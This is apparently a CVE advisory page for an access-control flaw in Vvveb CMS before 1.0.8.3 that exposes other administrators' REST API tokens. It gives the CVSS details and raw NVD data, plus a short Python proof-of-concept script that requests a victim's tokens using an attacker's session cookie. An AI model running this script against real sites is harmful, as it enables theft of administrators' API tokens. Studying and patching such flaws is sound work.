Security Vulnerability Report
中文
CVE-2026-46407 CVSS 8.1 HIGH

CVE-2026-46407

Published: 2026-05-15 19:17:04
Last Modified: 2026-05-15 19:17:04

Description

Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.3, the backend admin/auth-token endpoint allows an authenticated administrator to load another administrator's REST API token list by supplying that user's admin_id. This can disclose sensitive API tokens belonging to other administrators. This vulnerability is fixed in 1.0.8.3.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Vvveb < 1.0.8.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Configuration target_url = "http://example.com" attacker_cookie = "PHPSESSID=attacker_session_id_here" victim_admin_id = "2" # The target admin ID to steal tokens from # The vulnerable endpoint endpoint = f"{target_url}/index.php?module=admin/auth-token" # Headers including the authenticated session of the attacker headers = { "Cookie": attacker_cookie, "User-Agent": "PoC-Scanner/1.0" } # Payload containing the victim's admin_id payload = { "admin_id": victim_admin_id, "action": "get_tokens" } try: # Send the request to exploit the IDOR vulnerability response = requests.post(endpoint, headers=headers, data=payload) if response.status_code == 200: print("[+] Request successful!") print("[+] Response content:") print(response.text) # Check if sensitive tokens are in the response if "token" in response.text.lower(): print("[!] Potential API tokens leaked.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-46407", "sourceIdentifier": "[email protected]", "published": "2026-05-15T19:17:04.327", "lastModified": "2026-05-15T19:17:04.327", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.3, the backend admin/auth-token endpoint allows an authenticated administrator to load another administrator's REST API token list by supplying that user's admin_id. This can disclose sensitive API tokens belonging to other administrators. This vulnerability is fixed in 1.0.8.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://github.com/givanz/Vvveb/security/advisories/GHSA-5g3g-x6mf-pwr6", "source": "[email protected]"}]}}